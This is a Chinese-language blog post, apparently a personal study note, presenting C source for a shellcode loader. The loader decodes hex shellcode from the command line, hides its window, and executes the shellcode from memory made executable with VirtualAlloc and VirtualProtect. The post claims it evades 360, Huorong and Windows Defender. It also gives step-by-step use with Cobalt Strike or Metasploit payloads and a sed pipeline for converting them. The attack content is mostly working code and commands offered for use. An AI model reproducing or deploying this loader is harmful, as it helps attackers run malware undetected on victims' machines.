loecho@垃圾桶

静态免杀学习记录: Hex字符串反转BypassAV

2020-09-15 · 2 min read
实战TIPS

0x01 代码:

  • Bypass360 火绒 Windows Defender
#include <stdio.h>
#include <Windows.h>

#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") # 隐藏窗体

int main(int argc, char* argv[]) {
    
	unsigned int char_in_hex;
	char* info = argv[1]; # 输入获取
	unsigned int iterations = strlen(info);
	unsigned int memory_allocation = strlen(info) / 2;

	# 反转字符Hex
	for (unsigned int i = 0; i < iterations - 1; i++) {
		sscanf_s(info + 2 * i, "%2X", &char_in_hex);
		info [i] = (char)char_in_hex;
	}
	
    # 替换shellcode第一字符串,加载在内存中在替换回来
    
	char fisrt[] = "\xfc";
	void* exec = VirtualAlloc(0, memory_allocation, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
	memcpy(info, fisrt, 1);
	memcpy(exec, info, memory_allocation);
	DWORD ignore;
	VirtualProtect(exec, memory_allocation, PAGE_EXECUTE, &ignore);
	typedef void(*some_one)();
	some_one func = (some_one)exec;
	func();

	return 0;
}



0x02 使用方法:

  1. CS MSF生成C语言paylaod:

    image-20200910142138154
  2. 字符串处理,生成C文件只保留,shellcode部分:

image-20200910142358295
  1. Linux命令处理,生成16进制字符串,用编译好的exe加载:
cat shell.txt | grep -v unsigned | sed "s/\"\\\x//g" | sed "s/\\\x//g" | sed "s/\"//g" | sed ':a;N;$!ba;s/\n//g' | sed "s/;//g"
image-20200910142750493
  1. 加载测试:
image-20200910143358864
image-20200910143556427

0x03 To do

后续可以加入自定义算法,简单的沙箱子判断,实现免杀

loecho@垃圾桶